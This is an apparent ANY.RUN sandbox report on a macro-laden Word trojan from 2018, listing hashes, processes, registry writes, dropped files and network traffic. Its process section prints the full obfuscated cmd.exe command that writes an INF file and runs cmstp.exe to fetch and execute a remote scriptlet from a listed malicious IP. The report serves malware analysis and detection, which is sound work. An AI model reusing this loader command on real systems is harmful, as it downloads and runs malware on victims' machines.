analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

dab3c2d1f6ab22c2b47dee48c1932dfcc06be7030e5e346041532d749da0e6bb.doc

Full analysis: https://app.any.run/tasks/e2141774-8210-45c6-82af-d02c57795fed
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: November 08, 2018, 06:42:59
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Author: Admin, Template: Normal.dotm, Last Saved By: cabane015 cabane015, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Wed Oct 17 02:44:00 2018, Last Saved Time/Date: Wed Nov 7 21:10:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 29, Security: 0
MD5:

89173C24DB6E9D1EDA4CE2BE04F25C59

SHA1:

3E598934BA1BCED054C77DD77E8AE1BDB6596B4E

SHA256:

DAB3C2D1F6AB22C2B47DEE48C1932DFCC06BE7030E5E346041532D749DA0E6BB

SSDEEP:

1536:/am5PVc8cT9hFxkWWqIcvdeF3Q/quClKq+y:jcT9lkTcvchQ/iK/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 24157.exe (PID: 1996)
  • SUSPICIOUS

    • Creates files in the user directory

      • cmd.exe (PID: 2244)
      • cmstp.exe (PID: 1904)
    • Executable content was dropped or overwritten

      • cmstp.exe (PID: 1904)
    • Uses TASKKILL.EXE to kill Office Apps

      • cmd.exe (PID: 2244)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3112)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3112)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 32
Paragraphs: 1
Lines: 1
Company:
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 29
Words: 4
Pages: 1
ModifyDate: 2018:11:07 21:10:00
CreateDate: 2018:10:17 01:44:00
TotalEditTime: 2.0 minutes
Software: Microsoft Office Word
RevisionNumber: 2
LastModifiedBy: cabane015 cabane015
Template: Normal.dotm
Comments: -
Keywords: -
Author: Admin
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
8
Malicious processes
1
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs cmd.exe no specs cmstp.exe taskkill.exe no specs 24157.exe no specs devicedisplayobjectprovider.exe no specs rundll32.exe no specs rundll32.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3112"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\dab3c2d1f6ab22c2b47dee48c1932dfcc06be7030e5e346041532d749da0e6bb.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
1
Version:
14.0.6024.1000
2244cmd /V /C set "Q_66=s" && !Q_66!et "Q_27=i" && !Q_66!et "Q_30=A" && !Q_66!et "Q_11=N" && !Q_66!et "Q_18=d" && c!Q_30!ll !Q_66!et "Q_23=%!Q_30!PP!Q_18!!Q_30!T!Q_30!%" && c!Q_30!ll !Q_66!et "Q_56=%R!Q_30!!Q_11!!Q_18!OM%" && !Q_66!et "Q_75=!Q_23!\M!Q_27!cro!Q_66!oft\!Q_56!.txt" && !Q_66!et "Q_64="^" && (For %i in ("[ver!Q_66!ion]" "!Q_66!ignature=$Wi!Q_11!dow!Q_66! NTf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "!Q_30!dvancedINF=2.5" "[DefaultIn!Q_66!tall_SingleU!Q_66!er]" "UnRegi!Q_66!terOCXs=Q_4" "[Q_4]" "%11%\%Q_53_1%%Q_53_2%%Q_53_3%,NI,%Q_69_1%%Q_69_2%%Q_69_3%%Q_69_4%%Q_69_5%%Q_69_6%%Q_69_7%%Q_69_8%%Q_69_9%%Q_69_10%%Q_69_11%%Q_69_12%%Q_69_13%%Q_69_14%%Q_69_15%%Q_69_16%%Q_69_17%" "[!Q_66!tring!Q_66!]" "Q_69_1=ht" "Q_69_2=tp" "Q_69_3=:/" "Q_69_4=/7" "Q_69_5=8." "Q_69_6=12" "Q_69_7=8." "Q_69_8=92" "Q_69_9=.1" "Q_69_10=5/" "Q_69_11=J7" "Q_69_12=Dl" "Q_69_13=HF" "Q_69_14=zD" "Q_69_15=_1" "Q_69_16=.t" "Q_69_17=xt" "Q_53_2=rO" "Q_53_1=sC" "Q_53_3=bJ" ) do @echo %~i)>"!Q_75!" && echo !Q_66!erv!Q_27!ceName=!Q_64! !Q_64!>>!Q_75! && echo !Q_66!hortSvcN!Q_30!me=!Q_64! !Q_64!>>!Q_75! && c!Q_30!ll !Q_66!et "Q_77=%WI!Q_11!!Q_18!IR%" && !Q_66!t!Q_30!rt "" !Q_77!\Sy!Q_66!tem32\cm!Q_66!tp.exe /s /ns "!Q_75!" && !Q_66!t!Q_30!rt "" /M!Q_27!N t!Q_30!skk!Q_27!ll /F /!Q_27!M w!Q_27!nwor!Q_18!.exeC:\Windows\system32\cmd.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1904C:\Windows\System32\cmstp.exe /s /ns "C:\Users\admin\AppData\Roaming\Microsoft\1003.txt" C:\Windows\System32\cmstp.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile Installer
Exit code:
0
Version:
7.02.7600.16385 (win7_rtm.090713-1255)
2704tAskkill /F /iM winword.exeC:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1996"C:\Users\admin\24157.exe" C:\Users\admin\24157.execmstp.exe
User:
admin
Company:
Okta
Integrity Level:
MEDIUM
Description:
Developments Dsbugtrends Notifies
928C:\Windows\system32\DeviceDisplayObjectProvider.exe -EmbeddingC:\Windows\system32\DeviceDisplayObjectProvider.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Device Display Object Function Discovery Provider
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2356C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -EmbeddingC:\Windows\System32\rundll32.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2260rundll32.exe C:\Windows\system32\hotplug.dll,HotPlugSafeRemovalNotification \\.\pipe\PNP_HotPlug_Pipe_1.{467e0667-7f8f-4b5a-80ea-1b1cfab368e2}C:\Windows\system32\rundll32.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 246
Read events
1 117
Write events
125
Delete events
4

Modification events

(PID) Process:(3112) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:0/k
Value:
302F6B00280C0000010000000000000000000000
(PID) Process:(3112) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(3112) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(3112) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1298661391
(PID) Process:(3112) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1298661504
(PID) Process:(3112) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1298661505
(PID) Process:(3112) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
280C000034445D592E77D40100000000
(PID) Process:(3112) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:h0k
Value:
68306B00280C000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3112) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:h0k
Value:
68306B00280C000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3112) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
1
Suspicious files
2
Text files
5
Unknown types
6

Dropped files

PID
Process
Filename
Type
3112WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRAB10.tmp.cvr
MD5:
SHA256:
3112WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFE2F16F3AA21850FA.TMP
MD5:
SHA256:
928DeviceDisplayObjectProvider.exeC:\Users\admin\AppData\Local\Temp\1541659455\PackageInfo.xml
MD5:
SHA256:
928DeviceDisplayObjectProvider.exeC:\Users\admin\AppData\Local\Temp\DEL6E7F.tmp
MD5:
SHA256:
928DeviceDisplayObjectProvider.exeC:\Users\admin\AppData\Local\Temp\DEL6ECF.tmp
MD5:
SHA256:
928DeviceDisplayObjectProvider.exeC:\Users\admin\AppData\Local\Microsoft\Device Metadata\dmrc.idx.0
MD5:
SHA256:
1904cmstp.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\J7DlHFzD_1[1].txtxml
MD5:B10C94F8763CF2A18FA2F370B75CD7B6
SHA256:3FABB4580F8CFBE7CE56F1BD2C81FBA8BA38DE37A6C244D8D812C2EA542E925F
3112WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3DE17F3E.wmfwmf
MD5:0B18A2DBC2AF888FAF6B3998AC5FAF7C
SHA256:104B08A36B1D1C4E249BC6314ECAF94AC7A39EE453EF0E28C7363F50477B5DF8
3112WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{17461A6C-4218-479D-87E8-E8A45433458E}.tmpbinary
MD5:B752922DFA38929F1C4C75629D7D3F6A
SHA256:656B774B9D330F525017CE10A6A0A399E50BD42F97F63EBF45659FEE6901135E
3112WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:F4C9C8881424965954BA5BEEFC449379
SHA256:D71EC99BF78F6E4071F23A97AFFEA8ECD7C13099DB33BC722048BA534420F8DA
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1904
cmstp.exe
GET
200
78.128.92.15:80
http://78.128.92.15/J7DlHFzD_1.txt
BG
xml
435 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1904
cmstp.exe
78.128.92.15:80
BelCloud Hosting Corporation
BG
malicious

DNS requests

No data

Threats

PID
Process
Class
Message
1904
cmstp.exe
A Network Trojan was detected
MALWARE [PTsecurity] Squiblydoo Scriptlet
1 ETPRO signatures available at the full report
No debug info